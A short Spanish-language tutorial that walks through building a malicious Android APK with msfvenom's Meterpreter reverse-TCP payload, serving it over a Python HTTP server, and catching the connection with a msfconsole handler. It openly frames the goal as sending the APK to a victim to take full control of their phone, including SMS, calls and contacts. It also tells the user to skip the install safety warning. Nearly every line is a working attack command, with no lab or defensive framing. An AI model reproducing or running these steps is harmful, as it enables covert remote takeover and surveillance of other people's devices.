IMPORTANTE: PARA HACER ESTE ATAQUE ES NECESARIO TENER UN SISTEMA OPERATIVO KALI LINUX
NIVEL DE DIFICULTAD:
â° â°Resumen: Vamos a crear desde la terminal de linux un apk infectado q enviaremos a la victima, una vez esa persona ejecute el apk tendremos acceso total a su dispositivo, pudiendo ver sus sms, enviar sms, llamadas, contactos, etc...
Paso nÂș1: Abrir terminal
Paso nÂș2: Ejecutar sudo su para entrar en modo root
Paso nÂș3: Ver ip privado con hostname -I
Paso nÂș4: Escribir msfvenom -p android/meterpreter/reverse_tcp LHOST=(tu ip privada) LPORT=433 -o virus.apk
Paso nÂș5: Crear servidor http con python para descargar el apk en el mĂłvil python3 -m http.server 80
Paso nÂș6: Buscar en el navegador del mĂłvil (tu ip privada):80 ejemplo 192.168.0.63:80 y descargar el apk
Paso nÂș7: Si al descargar te sale un aviso de que la aplicaciĂłn no es segura, dale a mĂĄs detalles e instalar de todas formas
Paso nÂș8: En la terminal escribe msfconsole
Paso nÂș9: Dentro del msfconsole escribe use /multi/handler
Paso nÂș10: Escribe set payload android/meterpreter/reverse_tcp
Paso nÂș11: Escribe set LHOST (tu ip privada)
Paso nÂș12: Escribe set LPORT 433
Paso nÂș13: Escribe run
Paso nÂș14: Ahora ejecuta el apk y acepta los permisos
Paso nÂș15: Y listo ya tienes el control de un dispositivo android, si no sabes que comandos utilizar escribe help y se te escribirĂĄn todos los comandos en la terminal
